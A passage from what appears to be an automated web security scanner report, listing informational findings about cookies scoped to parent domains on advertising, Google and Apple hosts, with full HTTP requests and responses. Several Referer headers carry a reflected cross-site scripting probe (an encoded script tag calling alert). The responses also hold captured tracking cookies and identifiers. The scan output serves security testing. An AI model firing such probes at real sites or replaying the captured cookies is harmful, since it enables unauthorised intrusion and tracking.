P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 15:16:56 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 15:16:56 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3; path=/; expires=Mon, 17-Oct-2011 15:16:56 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 15:16:56 GMT

GIF89a.............!.......,........@..L..;

13.55. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1297100700-4279215%7cMUID%3d3957719be8f34a5da51d204e7e06704a%7cTOptOut%3d0%7cEANON%3dA%253d01200223vG8IEYTq8jK1b5BY7VQmQPnJpKgphDUO192CSIIO2XgKuc6vr_ofSjLaFKNoS26Rc2PdVlSL3K-WngKmkXG7Y%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=7212282717808390200; icu=ChII1LEDEAoYASABKAEwu9mX8QQQu9mX8QQYAA..; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; sess=1; acb865736=5_[r^XI()v4bi][?zqy!u_x5%?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQF5Z1VY7FHdfOHCoZussF2S77CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAApxEBAgUCAQUAAAAA3ByADAAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108283%29%3Buf%28%27r%27%2C+510110%2C+1311108283%29%3Bppv%2815053%2C+%276878989200924170590%27%2C+1311108283%2C+1316292283%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:48:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:48:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; path=/; expires=Mon, 17-Oct-2011 20:48:57 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:48:57 GMT

GIF89a.............!.......,........@..L..;

13.56. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=119479&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lMs6P<)J70wKur<4<v9OZO`Cw?@(Ab3:R+2+c*%kr_:/X?Ak)WHO20e`pWODr.>EsQS(i-/Uy@K#D7=I`9Qj@i3IohFAK=EpRp=8iu`6^AvvYk57spMsA)Ny*m.MyKl%6BGq:Z^JcaKu)vEjYeujF+b18Fxm$MOR[)JLvcE)KO.76.qSHhgdqaIoB3RUYvPr0ZUf8Mh>2(^8PuQ+pSy][H%!:[iu4(rjI=E2'(lt=A70n`br-)rlaU@wBi9QioLa5X=$?7#DE]G)+bEfWTC1N2N$sXR2uWJeK-t44)iJf!Tsxb1Hy$8u6!mev>PNiog3FKUi9zSrzOyk*7aLWipoyDNXpz%#4WpCQ33u)c/NZ+Ej@zm+pq's!ITh`d8qDCqG4Q>(A@>d]>.cU%4$N^3_TQLU7L/Kq@O2F1+`*#jEI'*a(l[D8LQ#v.'w-3C-l>x.+bl?X<MIjG.?wV[9f1UU!>ac5ax>4aPE$ITii[4F7a%wePpjn$yOcwGf2jKcpAgKt#y:p<2GQqffer]c]Qt@xdELEaQGpAoL6c=z:-vT@v0=Gt655NI-[md]lT27($Xn$WCtH6_Y$oH`demw_qZ#QHw_Qhm1sPsY@oJMeP+HWCPm?rlbvf5u4jXkc8V=3B2X<X=scd*e+!ZF<_T[1il0l41u6oC+UA/SrjIEroHr<LVLh5)+D1K*MCQzWP!ozwCxQoPV:y!MK75J@Br)2-u%<]t`V1G7?_68GN2TTYW94>mfiE`pG:#(XC^p>uJ7*fY!pYkDwpm'k?4istsNK%wwPIa(y<p%; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Location: http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1
Date: Tue, 19 Jul 2011 18:37:06 GMT
Content-Length: 0


13.57. http://id.google.com/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=aKI8Qf38sf5iqNDvmpR9QaOsG2ENxWmS7isjd7hL6A=s5nRc0fO0BVFm7NB; expires=Wed, 18-Jan-2012 20:49:48 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:48 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.58. http://id.google.com/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=aKI8Qf38sf5iqNDvmpR9QaOsG2ENxWmS7isjd7hL6A=s5nRc0fO0BVFm7NB; expires=Wed, 18-Jan-2012 20:49:48 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:48 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.59. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=beeaba0f-bbae-41f9-a021-0d36561089d9 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/BING_ENGAGEMENT_DISCOVERBING_GLOBAL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330; domain=.interclick.com; expires=Mon, 19-Jul-2021 15:16:57 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 19 Jul 2011 15:16:57 GMT

GIF89a.............!.......,...........D..;

13.60. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE5OTYmdGw9MTAwODA= HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; KRTBCOOKIE_57=476-uid:7212282717808390200; PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; KRTBCOOKIE_22=488-pcv:1|uid:3698952182471149434

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:06 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; domain=pubmatic.com; expires=Thu, 17-Jul-2014 19:10:42 GMT; path=/
Content-Length: 42
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.61. http://images.apple.com/global/nav/scripts/globalnav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 21 Apr 2011 20:13:41 GMT
If-None-Match: "6e6f-4a173609c2740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Cache-Control: max-age=356
Expires: Tue, 19 Jul 2011 18:56:37 GMT
Date: Tue, 19 Jul 2011 18:50:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=eKwIcPZgJHsw/8hbkWk9NfbHjaEfvezhpVDm9O8an1EjF8hLQjxhpUGXNk+TIL7iWWOIrci6QZbyox1vAlXFVihrt8rDm2O1C6WZLWbAaeFfFc7jmCkxXgIJaupEJRaY6NgELLxXeKF6EFrxpC7vR5zyxY1a4A3pO+U0y8n9QBs3xRZfEwZgN9+DCPhXS98jOpRP7LpdSOv2oPnk8imbvq0cQipmLUkqb4k/+DxDtbStL1gFEy4RIwc2KInyZBbJTTULrcNK344YNZQOBNahULD1xr0ZcBZuhC5lRSS+hbELGgk0olyljSa4egdnMaJfinm6RL25YdaJ0dnV06Zyy+AHGuS35bhCQUMkT6XaneeJ/deVwipi4jmBu0ZUjOukjt15yG/+Z/DVtLPltA7trg0BnR+smGw+vCc1PTuMBLhsnRKdF9q7TVZPFLMsXPy7DRG/9FOpNiW6ByUXJh8RgVGxqTBDP8GgLVcbjQDZ/IlZJXnQOajXAhKlz9efbW//nt1FnB+h0mxLTQ1q+LO/zePTWbXI3IlzV1FTThIKOC19AyDmCBQUmUkMEDKnmJ8E; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.62. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT
If-None-Match: "2930-4a3055a8a0000"

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=371
Expires: Tue, 19 Jul 2011 18:56:51 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=QdtF1drqHnVlSB+HwBLvnZMiEH6obQO+cu9Z/v2U4XKn7rs0v9NnOT8WpKGzWszZlmje/F2XWEPjpKcWLnxgaqw4+z0GeGzRkZ9NOc/XiCNPPBXvTsfWU/g93BDPgA5zkECn2p9RSPgnJEs58xCAf8Cyl5p8pL4q0s5Aprv3Hs42UW70Bq0TWB0AbW4MKqf0HabQXZ+JvBhnCX2ORQFO2SJmDWUxjUkeeXAtgAUN5hIVdywMaWSem8rwn+z7IrWlTS/hxGAGzAZE8P/DWcNTgVmHWuZYsNMed65Ys0NGnEexIGgeNdPrLu2Mqi1suK7HER0VT6wkB9Kwf1Cz4qdD2Y6ZyKYHSnAYTn0P4ENkkZnV0fK7QYR5TLqAMO21fhZjuKqoVUVyYY6Qa4AUEikaRwSSGj0PQn0LhG7Waf8R398H2av/rJYZxvilwDxaDMZY2Y2ok/AFZpf0uBMPk9+1hKXcD6060vM7LXdbkrcPWkzwdvbpK+RHINHLtSVt6HMqGCAdX4NakPCikSyRX6v1+sF3E8CWlp5sb00mun82sVBkihULVVRPk9DdFPGZhes2; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.63. http://images.apple.com/global/scripts/apple_core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
